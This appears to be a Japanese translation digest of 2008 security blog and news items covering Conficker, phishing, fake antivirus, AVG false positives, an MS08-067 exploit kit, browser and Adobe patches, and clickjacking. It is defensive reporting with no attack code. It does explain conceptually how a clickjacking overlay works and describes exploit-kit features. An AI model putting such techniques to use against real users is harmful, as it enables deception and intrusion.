 Conflickerは「ポート1024と10000の間のポートをランダムに開き、Webサーバーのように活動する。」 一旦感染すると、そのコンピュータは「ワームによって開かれたランダムなポートを使用してHTTP経由でワームのコピーをダウンロードする。このワームは、メモリ中の脆弱性あるAPIをパッチするので、感染したマシンにはもはや脆弱性は存在しなくなるということに気付くことは興味あることである。そのマルウェアの作者が他のマルウェアに感染させないように、そのコンピュータをケアしているということではない。」 さらに、Confickerは現在時刻同様に外部世界に表示されるIPアドレスを発見するために様々なWebサイトを検索する。Symantecは、その時間を利用してワームが更なるコードをダウンロードするために、次にコンタクトするドメインのリストを形成すると発言している。
 Conflickerからコンピュータを守るために、Microsoftセキュリティティアップデートをインストールし、ファイアーウォールをアクティベートすべきである。WindowsXPに統合され、SP2からデフォルトでアクティベートされている、このファイアーウォール(【訳注】WindowsXPにビルトインのファイアーウォールのことです)で十分である。しかしながら、セキュリティ目的のためには、ユーザはそれらの設定をチェックし、RPC脆弱性からサービスを損傷させようとするアクセスを与える(例えば、ファイルとプリンタ シェアリング)、故意ではない例外さえ定義されていないことを保証すべきである。

フィッシング サイト
F-Secure Weblog : News from the Lab (2008/11/25)

 ここにそのサイトのスクリーンショットがある。

 このサイトは、誘惑する餌としてGoogle AdWordsを使用しているフィッシング サイトである。このサイトが実行しようとしていることはGoogle AdWordsアカウントのユーザ名とパスワードを盗むことである。そして、あなたのクレジット番号も。さて、もう一度見てみよう。ブラウザ上には何が申し出られているのか見てみよう。

 イヤー結構。このサイトに私のパスワードを保存するなんてまっぴら。ご丁寧にどうも。

マルウェア付きLenobo(IBMのPC)
Kaspersky : Lab Weblog (2008/11/21)

 あなた方の中には我々の同僚Ryan Naraineが、Lenobo Thinkpadドライバーのパックに付属してマルウェアが配布されているとするZDNETにポストされたブログを見たかもしれない。以下にこの話のちょっとした詳細を記す。
 Microsoftの研究者と一緒に仕事していて、我々はIBMのFTPサイト上のファイルを示すURL(それは誤検出のように見えた)を発見した。そこで、我々は'heads up'メッセージを彼らに送信した。
 このファイル(q3tsk04us13.exe、WindowsXP用Lenovo Trust Keyソフト)を慎重に解析したところ、問題のこのファイルはVirus.Win32.Drowor.aと名付けられているウィルスを含んでいた。幸いにも、このウィルスは壊れていたので動作しなかった。
 当然、我々は即座にIBMに注意換気した。そして、IBMはこのファイルをオフラインにした。我々はIBMの迅速な応答に感謝する。そして、このファイルの初期解析を行ったMicrosoftの友人に感謝する。

Search-and-Destroy
F-Secure Weblog : News from the Lab (2008/11/21)

 幾つかのインチキ アンチウィルス アプリケーションには、公然とした悪意がある。XP Antivirus 2008とXP Antivirus 2009は、Rootkitを利用した多くのアフィリエイトと、それらをインストールする(それから購入させる)ための多くの別の汚らわしい技術を持っている。それらは正に腹立たしいものである。
 おもしろい余談であるが、XP Antivirus 2008とXP Antivirus 2009は、実際には別のギャングによって作成されている。変種の中には、相手をアンインストールしたり無効化することを企てるものがある。
 我々がスケアウェア(【訳注】偽のメッセージを使ってユーザーに製品を購入させようとするソフトウェア)と言うよりむしろレイムウェア(【訳注】説得力のない見え透いたソフトウェア)と呼びたくなるような、悲しみを誘うインチキがある。
 先週、自身を"Mirando"と呼んでいる者が、我々が管理するコメントシステムに、以下を投稿した。

 この様なコメント(怪しげなアプリケーションの販売促進)をして我々が是認する確率はどの程度だと思っているのだろうか? ありえない。
 以下は、search-and-destroy .comサイトの内容である。

 このサイトは単純なアニメーションベースのFlashグラフィックを使用している。訪問者を怖がらせようとするインチキのスキャンは存在しない。全てが静的である。多分名前に頼っている。
 このアプリケーションsearch-and-destroyを、Spybot Search & Destroy(著名で高く評価されるアンチスパイウェア アプリケーション)と混同してはならない。
 我々はSearch-and-Destroyアプリケーションをダウンロードしテストしてみた。
 最初に、リスクは0であるかもしれないとする警告を出してきた。

 次に、我々はスキャンを実行した。そして159の「問題」が発見された。159全てが、このトライアルバージョンでは修正不可能であった。

発見された、無効なショートカットの「悪意ある脅威」の一部。

 正に、このリンクは無効なリンクであり、脅威ではない。
 そこで、我々はこのアプリケーションをアンインストールしたが、レジストリキーは削除されなかった。
 典型的である。このスキャンは無効なショートカットを我々に警告した。そして、無効なレジストリキーは削除しなかった。
 Mirandoは同様のことを他のフォーラムにもポストしていた。
 我々のコメントシステムに投稿したときに使用されたIPアドレスから、Mirandoはインドのニューデリーに住んでいる。我々は彼が若者であり、アフィリエイトプログラムを使用して、てっとり早く金儲けしようと企てたのではないかと疑っている。
 我々は、彼が前途ある間に終了することを、本物のインチキソフトの側に移行しないことを希望する。 VirusResponse Lab 2009
F-Secure Weblog : News from the Lab (2008/11/17)

 先週の金曜日、我々はインチキ アプリケーションVirusResponse Lab 2009に遭遇した。このインチキ アプリケーションはソーシャルエンジニアリング攻撃の一部として404ページを使用していた。
 多くのインチキなアフィリエイト サイトは、アニメーションの「オンラインスキャン」を発生させるためにスクリプトを使用する。次に、ポップアップダイアログを使って訪問者にインチキなインストーラをダウンロードさせようとする。
 404dnswebsite .comは、異なったアプローチをとっていた。インチキのスキャンとダウンロードを催促するよりむしろ、単純な404エラーメッセージをポストしていた。

 犠牲者がこのトリックに嵌まったなら、我々がFraudTool.Win32.Agent.ehとして検出するものをダウンロードさせられるだろう。
 上のスクリーンショットに見られるように、騙しのページは全くダイナミックではない。我々がLinuxベースのシステム上でFirefoxを用いて開いた場合でさえ、このページは"Internet Explorer"のテキストを表示した。
 この404dnswebsiteのアカウントは現在停止されている。

AVGのもう一つの偽警告(アップデート)
heiseSecurity : Security (2008/11/17)

 AVGアンチウィルスプログラムは、また再びトロイでないものをトロイと同定していた。最近AVGはWindowsシステムライブラリを誤って削除する警告を発してしまった。次に、ウィルス定義ファイルをアップデートした結果、Adobe Flashをマルウェアとして同定した。AVGはinstall_flash_player.exe ファイルをPSW.Generic6.AQPDとして結論し、それを削除するよう要求した。AVG 7.5と8のフリーウェアとフルバージョンが影響を受ける。
 AVGのベンダーは今迄、この偽警告に関する公式発表を行っていない。しかし、無料版のAVGフォーラムのモデレータは、この問題は解決されたとアドバイスしている。つい先週、AVGはWindows user32.dllシステムファイルが、PSW.Banker4.APSAもしくはGeneric9TBNマルウェアを含んでいるとして通知することによってユーザを不穏にさせた。この削除要求を実施した人々は、もはや彼らのWindowsシステムを起動できなかった。AVGアンチウィルス8.0の無料版は、広範に使用されている。

アップデート

 AVGは公式声明中で「AVG Technologiesは、最新のFlash Playerのアップデートをダウンロードした時、AVGのフリーウェアを使用している限られた数のユーザが経験している誤検出警告発生の状況に対し即座に行動した」と発言している。AVGは、この問題が「最初のアップデートから三時間以内に行ったアップデートで置き換えることで、ユーザには更なる問題は発生していない。弊社は将来の製品のアップデートにおいていかなる潜在的脆弱性も同定され、ユーザに衝撃を与える前に削除することを保証するための新しく、更に厳しい品質管理基準を設定することを継続している」とも述べている。

商用マルウェアキットにMS08-067の脆弱性攻撃が同梱された
McAfee Avert Labs : Blog (2008/11/14)

 おそらく今月、中国セキュリティ コミュニティで最も広範に報道されているトピックは、中国のユーザによってカスタマイズされたMS08-067攻撃パックが商用利用可能になったことだろう。2008年10月26日、脆弱性を攻撃するコードが良く知られている公共のリポジトリサイトにポストされた。数日後、マルウェアキットの作者WolfTeethは、迅速に彼の顧客に対し、インターネットからフリーコードを使用して攻撃を可能にするMS08-067ポートスキャン ツールの販売を行った。

 彼のマルウェアショップでのピークを記録した。販売されているバックドアキット(別名、Beetleリモートコントロール キット)を含む一連のマルウェアキットが発見された。このキットはBackDoor-AWQ(中国のWebサイトで販売されている別の悪名高い商用キット)に類似の機能を提供する。このキットは共に無料バージョンと以下の拡張機能の付いた商用バージョンを提供している。

    ・ Kernel rootkit
    ・ アンチウィルスソフトウェア強制終了
    ・ 毎週のアンチウィルス検出のモニタリングと回避サービス
    ・ Web DDOSアタックオプション(アクティブWebアプリケーションサイトのような高価なHTTPリクエストを使用しているWebサービスをターゲットにする方法を使用している)

 販売者は価格については彼に接触するよう顧客に案内しているが、あるページ上で、彼はAdClickerトロイキットを258人民元 (およそ37.80US$≒3780円)で公開している。このキットは彼の顧客に対し感染したマシンを使用して、広告型検索サービスサイトから金銭をせしめることを可能にしている。同様に、このキットは中国においてポピュラーなアンチウィルスソフトウェアを強制終了させる高度な機能(アップデートのダウンロードとステルス機能)を宣伝している。

 彼はまた彼のツールが「法的な目的」で決して使用されてはならないことを、全ての顧客に周知するため免責条項としてポストし、「研究利用」のためだけに販売されていることをポストている。顧客サービスに関し、彼はまたインターネット上の他の者によって配布された彼のキットの「トロイの木馬化」されたバージョン(バックドアユーザをスパイするためにバックドアをインストールする)について顧客に警告している。
 このマルウェアショップは、つい最近中国の南京からWang Zeyuの名前で登録された(2008年10月16日)ドメイン上でホストされている。このツールのリリース以来、大手中国メディアは注意を呼びかけている。
 McAfee Avert LabsはこのツールキットをExploit-MS08-067 (以前のデータベースではGeneric.dx)として検出する。ドロップされた脆弱性攻撃ツールはExploit-MS08-067(トロイ)として、ポート スキャンニング ツールはTool-TCP Scan(アプリケーション)として検出する。

AVGはAdobe Flashにトロイの木馬のラベルを貼ることを執行した
Channel Register : Software & Security (2008/11/14)

【訳注】CNETによると、AVGがWindowsコアコンポーネントをトロイの木馬として検出するのは、オランダ語、フランス語、イタリア語、ポルトガル語、スペイン語版とされていましたので、和訳していなかったのですが、Flashまで誤検出されたので和訳しました。

 アップグレードが行われた後の三つ目の誤警告。
 人気のあるアンチウィルス プログラムAVGは、Adobe Flashを潜在的に悪意あるプログラムとして誤検出していた。この大失敗はWindowsのコア コンポーネントをトロイとして誤った警告を執行した数日後に出現した。
 AVGフォーラムのユーザは、最新のアップデートを実行した後、AVGのスキャナがAdobe Flashを悪意あるプログラムとして検出することを説明された。日曜日に実行された定義ファイルのアップデートにより、user32.dll(Windowsコア コンポーネント)を銀行データを盗むトロイとして同定した後、この失敗は紛れもないヘマに繋がった。AVGのアドバイスに従ったユーザと「害になるとされたファイル」を削除したユーザは、ブートに失敗するか、起動時に無限ループに陥るかのどちらかとなり、システムが起動しなくなった。AVG7.5と8(フリー版、フル機能版共に)のユーザが影響を受ける。
 未だ一月もたっていないが、AVGはCheckPointのZone Alarmをトロイとして同定した。
 アンチウィルス プログラムによる誤検出は良く知られているアキレスの腱である。誰でもが時々誤検出の問題を持っているが、一月足らずのうちにこのような問題を三つも発生させられると防ぐことは困難である。
 最新の問題に関し質問されたAVGは、木曜日にリリースした発表(Flash問題が浮上する前に、Windowsのコンポーネントの大失敗によって影響を与えた、無料の一年間ライセンス、もしくは拡張ライセンスユーザに提供したもの)に追加することは何もないと発言している。AVG Technologiesは、彼らの顧客に対し不便をかけたこを再び謝罪した。そして世界中に散らばった彼らのユーザに対し、この会社が将来類似の問題の発生を回避するために新たなプロセスを提供することを保証すると発言している。
 この発言は同種の別の問題の一日後だったので、あまり信用できない。
 このチェコを拠点とする会社の全ての人は(特に品質保証部門の人々)、自分たちを徹底的に恥じるべきである。
 我々は会社としてのAVGを好んだ。そして数年間このソフトウェアを使用した。しかし、この一連の誤警告は、この夏の偽のtraffic spew問題を考慮の対象から外してもなお、この信頼を揺るがせた。我々のグラフィックアーティストは既にパブで実行しているのだが、我々はあなた方がAVGにdunce's cap(【訳注】劣等生に被せる帽子)を被せるように申し出る。

Firefox 3.0.4は9つのセキュリティホールを閉じた
heiseSecurity : Security (2008/11/13)

 Mozilla Foundationは、9つのセキュリティホールを閉じるためFirefoxのバージョン3.0.4をリリースした。ここの開発者は犠牲者のシステム上でアタッカーが任意のコードを実行することが出きる四つのセキュリティホールを「重大(Critical)」と格付けしていた。重大なセキュリティホールの一つは、特別に細工されたサーバーの応答を利用した古典的なバッファオーバーフローである。
 JavaScriptコードが実行されたとき(このコードは異なったWebサイトのコンテキスト中のコードを実行することで脆弱性を攻撃することができる)、プログラムがクラッシュした後このブラウザがセッションを修復する方法のフローは、Same-Originポリシー(【訳注】Webページで動作するプログラム等は、同じドメイン上のデータしか読み込めないという制限)違反をFirefoxに発生させる。例えば、アタッカーは、他のWebページへのユーザのアクセスデータを盗むためにリモートからクラッシュや、それに続いて再起動を発生させることができた。
 二つの「重大」なセキュリティホールは今迄クラッシュを発生させるとして監視されてきたが、ここの開発者は、このフローがメモリ上のデータ損壊に関連し、コードを挿入し実行される脆弱性なのではないかと疑った。nsXMLHttpRequest::NotifyEventListeners関数におけるSame-Originチェック中のフローは、アタッカーが他のページのコンテキスト中のJavaScriptを実行することもまた可能にする。ここの開発者は、このセキュリティリスクを「高(high)」として格付けしていた。
 追加された二つの「重大」なセキュリティホールは、Firefox 2.0.0.18 と SeaMonkey 1.1.13で閉じられていた。この二つの脆弱性はメモリ上のデータの損壊で発生させられ、主にプログラムのクラッシュを引き起こしたが、ここの開発者は、これらの脆弱性がシステムへ感染を引き起こすことのできる脆弱性であることを排除しなかった。特別に細工されたShockwaveと他のファイルは、ブラウザに今、本質的にマップされていないメモリ領域へのアクセスの継続を与えることなしにFlashプレイヤーに間違いを引き起こすことができる。
 フローの幾つかはThunderbird(メールクライアント)にも含まれている。そして、バージョン2.0.0.18で修正されている。通常、アップデートされたThunderbirdのバージョンは、例外なく、それぞれのブラウザがアップデートされた数日後にリリースされる。
 Firefox 2.xのユーザはバージョン3.0へアップグレードすべきである。ここの開発者は11月中旬に2.xのサポートを終了するとアナウンスしている。これ以降もはやセキュリティアップデートはない。ここの開発者はサポートウィンドウの延長を論議した(例えば、Thunderbirdは以前のバージョンのGekkoエンジンを未だ使用しているので)。セキュリティサポートの打ち切りは、このアイデアが採用されなかったことを意味している。

新たなスパムの狡猾な策略
Sunbelt : Blog (2008/11/08)

 スパムの新規な方法が、よくあるViagra/Levitra/Cialis(【訳注】Viagra=バイアグラ。周知につき省略。Levitra=レビトラ。男性性器の勃起組織中に存在し、勃起不能に深くかかわる酵素。Cialis=シアリス。主成分のタダラフィル(経口PDE5阻害剤)の働きにより血流を活発にし、十分な勃起力を約24時間近く維持する)スパムの連中によって使用されている。
 まず、Yahooグループへの仲間入りを招待する以下のようなメールが届く。

 わざとらしい。これは名声を利用したハイジャック(reputation hijacking。完全に合法なサービス(Yahooグループ)なので、あらゆるスパムフィルターを正当なものとして通過する)の一形式である。
 “Join this group!”をクリックすると、スパム化された処方薬の広告を除けば、ありふれたYahooグループのページがもたらされる。

 もちろん、目的はあなたにグループへの参加をしてもらうことではない。スパム化された処方薬の広告を表示する単なる策略である。
 もしも仲間入りしたら、当然、あなたは素敵な無料の贈り物(スパマーによって稼働されているYahooグループへ、あなたのE-Mailアドレスを教えること)をしたことになる。ここに彼らが使用しているHTMLコードがある (面白半分、あなたは彼らが犯したミスに気がつきますか?)

 名声を利用したハイジャックはマルウェア ソーシャル エンジニアリングとスパム行為の将来の大きな部分である。同様な大変多くの行為が予測される。

Adobe、最終的にFlash Player 9.0.151.0をリリース
heiseSecurity : Security (2008/11/06)

 Adobeは、ある理由から現在のFlash Playerバージョン10にアップデートできないユーザを見捨てることを回避するために、9.0.151.0をリリースした。これは、Microsoft Windows 98, Windows ME, Mac OS X 10.1〜10.3, Red Hat Enterprise Linux 3と4 のユーザを含んでいる。Adobeによれば、バージョン10は、これらのシステム上では稼働しない。当初Adobeは、バージョン9シリーズのサポートを継続しない計画だった。
 バージョン9.0.151.0は、10月中旬にバージョン9.0.124.0に出現し、既にバージョン08-11-06 10.0.12.36で塞がれているところのセキュリティホールを塞いだ。このアップデートは別の6つの脆弱性(クロスサイトスクリプトの脆弱性、DNS再結合を許可する脆弱性、Javaアーカイブとの接続中での幾つかのプロセスフローを含む)も修正している。

Adobeは、Reader 8 と Acrobat 8の幾つかの深刻なセキュリティホールを塞いだ
heiseSecurity : Security (2008/11/05)

 Adobeは、8つのセキュリティホールを塞ぐためにAdobe AcrobatとフリーのAdobe Readerのバージョン8.1.3をリリースした。これらセキュリティホールの幾つかは、アタッカーがシステムにコードを注入でき、特別に細工されたPDFドキュメント経由でそれを実行することが可能であった。WindowsとMac用のAcrobatとReaderの現在のバージョン9.xは、影響を受けない。WindowsとMacユーザは、バージョン9にスイッチするか、8.1.3にバージョンアップすれば良い。
 しかしながら、8.1.3は、Linux/Solaris/HP-UXユーザにとって唯一利用可能なバージョンである。将来的にも、バージョン9はこれらのシステム用にリリースされないだろう。Adobeダウンロードセンターで、ユーザは様々なバージョンを選択できる。アップグレードされないだけでなく、若干の理由からアップデートもされない様なバージョンの利用者は、ReaderとAcrobat中のJavaScriptサポートを無効化すべきである。
 この脆弱性はJavaScriptプロセスのフローによって発生する。フローの一つは、不正にチェックされた浮動小数点型指定子を含む書式文字列付きPDFファイルに埋め込まれたJavaScriptを発生させる。バッファオーバーフローは、結果としてutil.printf()を発生させるかもしれない。このアプリケーションのスタック中にコードの挿入を可能にし、ユーザの権限レベルで実行することを可能にする。
 おもしろいことは、幾つかのセキュリティサービスプロバイダが、殆ど同時にこのセキュリティホールを発見したことである。しかしながら、このことは五ヶ月前にAdobe Reader代替のソフトウェアFoxit Readerが非常に類似したセキュリティホールを塞いだことから、彼らがこの様な脆弱性をフォローアップしていたからである。オーバーフローは特に細工されたフォントをロードすることによって発生させられる。さらに、伝えられるところによれば、別の詳細不明のフローはメモリーリークをトリガーする。
 ユーザは最新バージョンのインストールに躊躇すべきでない。それにも拘わらず、公開されていない脆弱性は今迄に同定されている。三つのサービスプロバイダが互いに独立してこの問題を見つけたのであれば、犯人がこのセキュリティホールにも気づいている可能性はありそうだ。 

クリックジャック、その2
McAfee Avert Labs : Blog (2008/11/03)

 二週間前、私はClickjacking(クリックジャック)が悪意あるWebサイトへの不可視のリンクを用いる方法について記述した。例えば、ユーザは正当なボタンに見えるようなものの上をクリックするが、実際にはユーザが見ることができていないサイトに連れていかれる。私はクリックジャックが、リスクが存在することを認識していないユーザを攻撃するための他の脆弱性と結合していると考えた。この攻撃ベクトルからユーザを保護することは非常に重要である。
 私は、この新たな脅威からあなた自身を守るための方法に関する幾つかのアドバイスをする。Firefoxユーザについて。Firefox3用のNoScriptアドオンの最新のバージョンを使用するように指示する。それはここで見出せる。IEユーザには、私はパッチを見出せなかった。しかし、私は複数のWebブラウザにおけるクリックジャックについて記した良い記事を推薦できる。あなたはIE, Safari, Chrome, Operaで実行できるアドバイスを見出せるだろう。幾つかのWebブラウザではIFRAMEエレメントをユーザが無効化することができる。しかし、この方法はIFRAMEエレメントを使用しているサイトでは、通常機能に影響を与えるだろう。もしもNoScript付きでFirefoxを使用していないのであれば、注意を必要とする

======================上の二つ目にリンクされているサイトから、IEとOPERAの和訳

Internet Explorer

 メニューからオプション>セキュリティ を選択。「インターネットゾーン」の「セキュリティレベル」を「高」に設定する。
悪いニュース : IEでIFRAMEを無効化する明瞭な方法は存在しない。あなたは「IFRAMEのプログラムとファイルの起動」を無効にすることができるが、この方法ではクリックジャックの防止には不十分である(【訳注】この設定をしても実際にはIFRAMEの内容が表示される場合が多いように思います)。さらに、Microsoftの「インターネットゾーン」は、個別サイトのスクリプトやアクティブコンテンツを許可するので、数回のクリックを要求し、そしてホワイトリストを構築するNoScriptに比較すると、このユーザビリティは如何にも貧弱である。要約すると、MicrosoftのIEはクリックジャックに対して100%安全にすることはできない。

Opera

 コンセプト : 希望するなら制限されたデフォルトを設定できる。そして、あなたが信頼するサイトに関し、サイト毎の設定とクイック設定を使用して幾許かの制限を解除できる。この機能はNoScriptよりちょっとだけ不満足であるが、クリックジャックを妨げる設定は可能である。設定>詳細設定>コンテンツ に進み、表示されている全てを無効にする。次に、Operaのアドレスバーにopera:configと入力し、Enterを押す。次に、"Extensions”ハンドルをクリックし、“IFrames”の行のチェックを外す。

MS08-067の脆弱性を突いたワーム攻撃の最初のレポート
F-Secure Weblog : News from the Lab (2008/11/03)

 先週言及された脆弱性の証明バイナリコードは、インターネット上に引っ越した。
 我々は、MS08-067の脆弱性を攻撃する能力のあるワームの最初のレポートを受け取った。この脆弱性攻撃の悪意の総体は、我々がTrojan-Dropper.Win32.Agent.yhiとして検出するトロイの木馬をドロップする。
 ドロップされたコンポーネントは、現在その構成において中国をターゲットにしているカーネルモードDDOSボットを含んでいる。
 このワームコンポーネントは、Exploit.Win32.MS08-067.g(F-Secureでは)として検出され、Rootkit.Win32.KernelBot.dg(F-Secureでは)としてカーネルコンポーネントを検出する。

Javaアップデートは以前のバージョンを削除することを約束
WashingtonPost : Security Fix (2008/10/27)

 Sun MicrosystemsはJavaソフトウェアクライアントの別のバージョン(JRE6 Update 10)をリリースした。このバージョンは、最新版(JRE6 Update 7)の新たなセキュリティ上の修正は何等含んでいないが、この会社が随分前に作成したバージョン(このソフトウェアの期限切れで危険なバージョン)をユーザのPCにポイ捨てしていたことを停止する約束を実行すると表明している。
 このブログの読者は私がJavaのファンでないことを知っている。Javaは人気ある大変強力なプログラムであるが、悪事を実行するためにプログラムの双方向性とパワーを活用することを望む邪悪なサイトからユーザを守るためにしばしばアップデートする必要がある。私がJavaを非難するもう一つの理由は、Sunのアップデートが以前のバージョンを削除しないことであった。結果として、Javaセキュリティアップデートを維持しつづけないなら、少なくともシステム上に三〜四の以前のJavaのバージョンを持つことになり、それぞれディスクスペースの100Mb以上を浪費する。
 何のサインもなかったので、Javaユーザは頻繁にアップデートすることができなかった。Update 10は"patch in place"能力(このアップデートはインストールし以前のバージョンを削除する)を含むと主張している。
 Sunが最終的にそのユーザベースからの呼びかけを傾聴したことは評価されるが、我々は未だUpdate 11を持っていないので、この”patch in place”プロセスが如何に良く動作するかを語ることは無理である。また、Sunが次にリリースするとしているUpdate 10では、それ自身を削除すると約束しているが、Update 10はユーザのシステム回りにウロウロしているUpdate 10以前のバージョンを削除しない。
 500Gbのハードドライブの時代に幾許かのJavaの古いバージョンが彷徨いていることを誰が気にかけるだろうか。あなたはどうだろう? 以前のアップデートにおいて、Sunは、最新のパッチされたバージョンがインストールされオペレーティングシステムとユーザのdefaultのWebブラウザの両方で使用されるための権限あるバージョンとして設定されていたとしても、Webサイトがユーザのマシン上に未だ存在する以前の危険なバージョンを起動することが可能であることを認識していた。
 Sunは次に、以前の危険なJavaのバージョンを起動しようとするサイトをブロックするテクノロジを実装した。しかし7月、セキュリティ研究者John Heasmanは、アタッカーがこのプロテクションをバイパスする方法の概要を発表した。
 ある最後通達 : 私がこの新しいバージョンをテストしたとき、私が数ヶ月前に購入したWindows VistaマシンにJavaがインストールされていないことを理解した。明らかに、私は購入以来Javaを必要としていなかった。

Microsoftから臨時のパッチ
F-Secure Weblog : News from the Lab (2008/10/24)

 これが実行されるのは極めて稀ですが、理由は健全です。昨日、MicrosoftはWindowsの新たな緊急の脆弱性に関し臨時のパッチをリリースした。
 パッチMS08-067(【訳注】リンクは日本語サイトに変更)はリモートプロシージャコールを修正している。脆弱性への攻撃が成功した場合、アタッカーは現在サポートされている全てのバージョンのWindowsが稼働しているコンピュータ上で、リモートからアプリケーションを実行することが可能である。
 この脆弱性のタイプは明らかに2003年と2004年に数百万のコンピュータに感染したBlasterとSasserと同種である。

 臨時のパッチがリリースされた理由は、この脆弱性を使用してコンピュータに感染しようとするアクティブなマルウェア(F-SecureはTrojan-Spy:W32/Gimmiv.Aとして検出する)が既に存在するからである。このトロイの木馬は感染したコンピュータから秘密情報を盗み出し、それをアタッカーに送信する。
 WindowsXP SP2やSP3はdefaultでファイアーウォールが有効になっているので、この状況は2003年や2004年当時ほど酷くないが、ファイルやプリンタシェアリングを有効にしているのであれば、あなたのコンピュータは影響を受けるかもしれない。
 今直ぐにこのアップデートを適用することを推奨する。

仏大統領サルコジ、銀行のアカウントをハックされる
The Guardian Unlimited : World News (2008/10/20)

 フランス大統領Nicolas Sarkozy(ニコラス・サルコジ)個人の銀行アカウントがハックされ、キャッシュを引き出されたことが浮上した後、フランス政府は昨日、インターネット詐欺から如何なる者も安全ではないということを認めざるを得なかった。
 無名のハッカーはSarkozyのオンラインアクセスコードを取得した後、そのアカウントから小額のお金を抜き取った。大統領はこの決済に気がつき、警察に通報した後、捜査は開始されたと政府のスポークスマンは発言している。
 「詐欺師は罰されるだろう」とLuc Chatel(消費者省大臣)はフランスのラジオで発言している。彼は、多くの業務がフランスにおけるインターネットバンキングのセキュリティを確固とするために実行される必要があるとも発言している。フランスの警察庁によれば今年、攻撃は9%上昇しているとされる。
 「このことは、銀行アカウントのインターネットチェックのシステムが絶対信頼できるものでないことを証明している。この様なケースは極めて稀なことだが、我々がどの様にシステムを改善するかを十分真剣に熟考している」とChatelは発言している。
 昨日窃盗のニュースを伝えたJournal du Dimancheは、「大統領を海賊した」計画立案者がアマチュアであるとは見えないと伝えている。

Clickjacking(クリック ジャック)
McAfee Avert Labs : Blog (2008/10/15)

 最近Clickjackingに関する話題がインターネット上での論議で賑わっている。これは新しいタイプのWeb攻撃である。そこで、Clickjackingとは何なのかを解明することにした。
 私はOWASP NYC AppSec 2008のビデオを、ここで見出した。ビデオ中で、Jeremiah GrossmanとRobert “RSnake” Hansenは、“New Zero-Day Browser Exploits ?ClickJacking(新たな0-dayブラウザ攻撃ークリック ジャック)”と題するプレゼンテーションでこの新しい脆弱性攻撃を報告している。私はまた、この脆弱性攻撃のデモをここで発見した。
 このビデオで、彼らはこの脆弱性の一部分だけを説明しているが、我々がClickjackingが何であるかの基本的考えを持つには十分なものである。
 これを説明するために、例を引くことにする。あなたが攻撃者によってコントロールされているWebページAを持ってをり、ページAはBという要素を含んでいるとする。Clickjack攻撃では、要素Bは透明に設定され、そしてレイヤーのZ-index(Z-インデックス、要素の積み重ねの順番)をCSS経由でページAの他の要素の上位に設定される。要素Bはまた、ユーザにそのコンテンツをクリックし易くさせるために大変大きくされる必要がある。次に攻撃者は、彼が要素B中に欲するあらゆることを実行するために、あらゆるボタンを設置することができる。そこで、攻撃者はページA上に幾つかのボタンを置いたことになる。これは要素B中のボタンの位置はページA中での、そのボタンの位置と一致しているからである。そこでユーザがページA上のボタンをクリックしたとき、彼らは実際には要素B中のボタンをクリックしたことになる。何故なら、要素B中に存在するボタンのZ-indexプロパティはページAのボタンより上位にあるのだから。この攻撃はDHTMLを使用する(Javascriptを要求することはない)。そこで、Javascriptを無効にすることは何等役に立たない。
 この脆弱性は複数のWebブラウザに影響がある。残念ながら、それ用のパッチは現在提供されていないので、ユーザは注意するしかない。この脆弱性はまた、Adobe Flash Playerにも影響を与えることが知られている。Adobeはセキュリティアドバイザリをリリースし、解決策を提供している。
 我々は、この脆弱性に関する新たな情報を求めてモニターを継続する。

セキュリティ ソフトウェア スウィーツはカスタムアタックと合致しない
Washingtonpost : Security Fix (2008/10/13)

 セキュリティ解析企業Secuniaによれば、メジャー アンチウィルス ベンダが出しているオールインワン セキュリティ ソフトウェア スウィーツは、最新のソフトウェアの脆弱性を攻撃するカスタムメイドのマルウェアの検出で無残にも散った。
 Secuniaは多くのセキュリティスウィーツが悪意あるファイルと、150以上の既知のソフトウェアフローを利用する直接攻撃に対して、どの様に良く動作するかをテストした。テストに使用された脆弱性の全ては、公に公開されている(それらの詳細は、Common Vulnerabilities and Exposures (CVE)データベースで見出すことができる)。そして、脆弱性の大部分は、プログラムメーカーからの現在利用可能なソフトウェアアップデートを適用することで修正できる。
 300のテストケースのうち126が特に重要である。その理由は、それらが非常に人気のある製品に影響するものであり、そして、Zero-day脅威として発見されたか、もしくはSecuniaがworking exploitを開発したかのどちらかであるためであると、Secuniaは発言している。Secunia CTO Thomas Kristensenは、テストに使用された脆弱性の全ては、セキュリティ危険度が中もしくは高と評価されていた。それらは、悪意あるファイルを閲覧するか開くこと以外はユーザが手を貸すことなしに、リモートから犠牲者のPCにソフトウェアをインストールすることができることを意味していると、発言している。
 結果によれば、Secuniaは殆ど全てのセキュリティスウィーツ(McAfee, F-Secure, Microsoft and TrendMicroを含む)が、この攻撃の1〜3%しか検出しなかったことを見出した。シマンテックのNorton Internet Security 2009は、劇的なパフォーマンスを示した。全ての脅威の20%以上を検出し、最も危険な脅威の30%以上を検出した。
 未だ、少なくとも70%は、目標にした脆弱性攻撃を使用している悪い奴等はNortonの防御をすり抜けていることを意味している。それはまた、他のセキュリティスウィーツが目標とされる攻撃の凡そ3%しか検出しないことを示している。
 全ての評価に関して、読者はSecuniaのテスト結果の詳細な分析結果と興味ある方法論をここで(PDF)発見できる。
 私は「目標とされる」という言葉を強調する。なぜなら、殆どのアンチウィルス製品は敏感に反応しており、その中で、アンチウィルス製品は人々が攻撃されていることを指摘し、ゆくゆくは特定の脅威を検出するためのカスタム シグネチャを作成することで顧客を保護することに焦点を当てている。大多数のアンチウィルス会社は、疑わしい挙動をしたり、特定のソフトウェアの脆弱性を攻撃する検出プログラムの能力が組み込まれていることを主張しているが、少なくとも、最新のもの(幅広く使用されているソフトウェア中の既知の脆弱性)に関連しているので、この点でSymantecのみが明らかに進んでいるように見える。
 Secuniaの研究は有用であるが、この研究は今日の脅威の不運な現実(ソフトウェアの脆弱性ではなく、主に人々を欺いてソフトウェアをインストールさせること)を無視している。おもしろいのは、Symantecが彼らのInternet Security Threat Report中に本件に関し、2007年下半期において、顧客に影響を及ぼしている新たな悪意あるコードの脅威の僅か10%がソフトウェアフローを利用していたとドキュメントしていることである。
 少なくとも、Secuniaの研究は、セキュリティ ソフトウェアのインストールが、最新のセキュリティパッチでアップデートしていないソフトウェアを安全に維持するための代わりにはならないという厳しい注意換気である。以前、私はSecunia vulnerability scannersを推奨した。このプログラムはこの会社のWebサイトや無料のインストールして使用するプログラムを通して動作する。読者の中には、このプログラムがJava(それ自身頻繁にアップデートする必要のあるプログラムで、それ自身の以前のバージョンをユーザのシステム中に残したままにするプログラム)のインストールを要求することからSecuniaのスキャナの使用を拒否する人がいる。私の見解では、全ユーザの90%以上が既にJavaをインストールしている。その上、定期的にパッチの必要性を平均的ユーザに対し、その認識を向上させることは全体的には良いことであるが、それにしても、JavaソフトウェアへのSunのお粗末さはどうしようもない。
